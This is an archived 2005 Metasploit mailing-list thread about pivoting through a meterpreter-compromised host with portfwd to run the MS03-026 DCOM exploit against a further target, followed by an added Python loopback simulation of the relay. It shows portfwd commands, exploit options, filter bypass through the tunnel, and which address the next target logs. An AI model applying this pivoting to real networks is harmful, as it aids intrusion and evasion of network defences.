Metasploit mailing list archives

use of meterpreter (copy for the list)


From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 10:14:56 +0200

Let's see if I understand correctly:
Exploiting another host and using meterpreter is the first thing I do.
Now the portfwd of meterpreter isn't running on the victim's host, instead it
is running on "my" host, correct?
Now I set up port forwarding using localhost and the next desired target IP.
When now running an attack based on the proxy, port forwarding does its job and
the exploit should work, correct?
Now my question for better understanding:
As port forwarding is running on my host and the target IP is different from
the "proxy host", why do I need to exploit the proxy host, as it seems to me
this host isn't needed when using localhost and the next target IP for the
"proxy attack"? How is the "flow of packets"?
In case of logging on the "next target host", which attacker IP will be logged?

Thanks for your help

mmiller at hick.org wrote:
On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:

1. Exploited "proxy victim" with metasploit's meterpreter payload.
2. In the meterpreter "shell" I'm adding some portfwds like this:
- portfwd -a -l 9500 -h 'nextTargetIP' -p 135
- portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another
test in hope it will work this time ...
3. Now I'm using the msrpc exploit with the win32_bind payload,
setting options to

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

 Exploit:    Name      Default        Description
 --------    ------    -----------    ------------------
 required    RHOST     'ProxyHost'    The target address
 required    RPORT     9500           The target port

 Payload:    Name        Default    Description
 --------    --------    -------    ------------------------------------------
 required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
 required    LPORT       4444       Listening port for bind shell

 Target: Windows NT SP6/2K/XP/2K3 ALL

4. Now launching the exploit

msf msrpc_dcom_ms03_026(win32_bind) > exploit

5. That's where it hangs:

[*] Starting Bind Handler.
[*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444

6. Waited long enough, killed the connection with Ctrl-C

Caught interrupt, exit connection? [y/n] y
[*] Exiting Bind Handler.

What am I doing wrong, or isn't it possible to use portfwd so attacks
can be redirected through a proxy?


The thing to note is that connections are proxied from your local
machine through the meterpreter connection to the target that you are
trying to reach.  In the example you provided above, it appears that you
are expecting the port forwards to be listening on the proxy host that
you initially exploited.  Instead, you should expect the port forward
listeners to be listening on your local machine.  All of the steps you
performed were correct, except instead of using 'ProxyHost' you should
use 127.0.0.1 for RHOST.  I imagine the reason the bind handler got a
connection is because you exploited the 'ProxyHost' with win32_bind
(using port 4444).

The reason connections are proxied starting from your local machine is
because this allows you to transparently bypass any sort of inbound or
outbound filters (since it tunnels through the already established
meterpreter communication channel).

Hope that helps!

-- 
MFG
Thomas Werth

Tel.: 02307 / 704 - 366
---------------------------------------------------------------------

Paul Vahle GmbH & Co. KG              URL       : http://www.vahle.de
Westicker Strasse 52  D-59174 Kamen   E-Mail    : thomas.werth at vahle.de
---------------------------------------------------------------------
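The packet flow mmiller describes, as an added in-process model (added here; it is not part of the thread and not Metasploit or meterpreter code): `PortForward` is the listener that `portfwd -a -l 9500 -h nextTargetIP -p 135` creates, bound on the attacker's own machine; `PivotHost` stands in for the already-exploited ProxyHost and is the hop that opens the outbound TCP connection to the target, which in real use meterpreter does over its existing session channel; `FakeTarget` stands in for nextTargetIP:135 and records the peer address it sees, i.e. what the target's logs would record. Everything runs on loopback, so all addresses come out as 127.0.0.1; the point is which hop calls connect(): the target sees the pivot, never the attacker's machine. The class names, the echo protocol and the payload are constructed for this demo.

```python
import socket
import threading


def _pump(src, dst):
    """Relay bytes src -> dst until EOF, then half-close dst so it sees EOF too."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PivotHost:
    """The exploited 'ProxyHost'. Meterpreter would open the target-side TCP
    connection from here over its session; this model just calls connect()."""

    def __init__(self):
        self.outbound = []  # (rhost, rport) pairs opened on the attacker's behalf

    def connect(self, rhost, rport):
        self.outbound.append((rhost, rport))
        return socket.create_connection((rhost, rport), timeout=5)


class PortForward:
    """The listener 'portfwd -a -l lport -h rhost -p rport' creates. It is bound
    on the attacker's own machine, so the exploit is aimed at 127.0.0.1:lport."""

    def __init__(self, pivot, lport, rhost, rport):
        self.pivot, self.rhost, self.rport = pivot, rhost, rport
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(("127.0.0.1", lport))
        self.listener.listen(5)
        self.lport = self.listener.getsockname()[1]  # real port if lport was 0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:  # listener closed
                return
            try:
                remote = self.pivot.connect(self.rhost, self.rport)
            except OSError:  # target unreachable from the pivot
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()

    def close(self):
        self.listener.close()


class FakeTarget:
    """Stands in for nextTargetIP:135: logs each peer address (what the target's
    own logs would show) and echoes the request back with a prefix."""

    def __init__(self):
        self.seen_peers = []
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, peer = self.sock.accept()
            except OSError:  # listener closed
                return
            self.seen_peers.append(peer[0])
            with conn:
                data = b"".join(iter(lambda: conn.recv(4096), b""))
                if data:
                    conn.sendall(b"target saw: " + data)

    def close(self):
        self.sock.close()


def demo(payload=b"hello 135"):
    """Attacker -> local portfwd listener -> pivot -> target, all on loopback.
    Returns (reply, connections the pivot made, peer addresses the target saw)."""
    target = FakeTarget()
    pivot = PivotHost()
    fwd = PortForward(pivot, 0, "127.0.0.1", target.port)  # thread: -l 9500 -p 135
    # The exploit module's RHOST/RPORT must be 127.0.0.1 and fwd.lport:
    with socket.create_connection(("127.0.0.1", fwd.lport), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = b"".join(iter(lambda: s.recv(4096), b""))
    fwd.close()
    target.close()
    return reply, pivot.outbound, target.seen_peers
```

Calling `demo()` returns the echoed reply, the one connection the pivot opened to the target, and the single peer address the target logged. Pointing the exploit at ProxyHost:9500 instead of 127.0.0.1:9500, as in the thread, would hit nothing listening on the pivot at all; the bind handler only connected because ProxyHost had itself been exploited earlier with win32_bind on port 4444.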
